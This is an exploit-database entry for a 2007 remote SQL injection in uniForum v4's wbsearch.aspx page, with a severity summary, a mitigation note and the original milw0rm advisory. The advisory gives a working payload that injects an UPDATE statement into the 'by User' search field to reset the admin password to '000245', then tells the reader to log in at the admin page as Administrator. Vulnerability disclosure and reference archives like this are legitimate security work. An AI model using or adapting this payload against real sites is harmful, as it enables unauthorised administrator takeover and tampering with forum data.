uniForum - exploit.company

vendor:

uniForum

by:

ajann

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: uniForum

Affected Version From: unspecified

Affected Version To: 4

Patch Exists: NO

Related CWE:

CPE: uniforum

Metasploit:

Other Scripts:

Platforms Tested:

2007

uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability

The uniForum version 4 (wbsearch.aspx) is vulnerable to remote SQL injection. An attacker can exploit this vulnerability by sending a specially crafted request to the wbsearch.aspx page. By manipulating the input parameters, an attacker can inject malicious SQL code into the application's database query, allowing for unauthorized access or manipulation of data.

Mitigation:

To mitigate this vulnerability, it is recommended to update to the latest version of uniForum or apply a patch provided by the vendor. Additionally, input validation and parameterized queries should be implemented to prevent SQL injection attacks.

Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  uniForum <= v4 (wbsearch.aspx) Remote SQL Injection Vulnerability
# Author  :  ajann
# Contact :  :(
# S.Page  :  ...
# Vendor  :  http://uniforum.biz/
# $$      :  $99

*******************************************************************************

[[SQL]]]---------------------------------------------------------

http://[target]/[path]//wbsearch.aspx (POST Method) [SQL]

Example:

//Fin the ->wbsearch.aspx Before, see "by User", it write ';update admin set Password='000245'--

Login Admin:http://www.xxx.com/[path]/wbadmlog.aspx
Username: Administrator
Password: 000245

[[/SQL]]

"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2007-01-09]